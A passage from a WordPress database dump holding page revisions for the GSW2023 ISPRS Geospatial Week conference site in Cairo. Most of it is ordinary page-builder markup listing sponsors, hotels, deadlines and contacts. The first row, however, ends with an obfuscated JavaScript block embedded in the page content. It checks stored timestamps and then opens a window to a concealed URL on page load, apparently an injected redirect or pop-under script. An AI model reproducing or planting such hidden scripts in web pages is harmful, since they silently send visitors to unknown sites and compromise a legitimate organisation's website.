_0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-23 23:59:46','2023-06-23 23:59:46','',3066,'https://gsw2023.com/?p=4766',0,'revision','',0),
(4767,1,'2023-06-24 00:00:12','2023-06-24 00:00:12','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 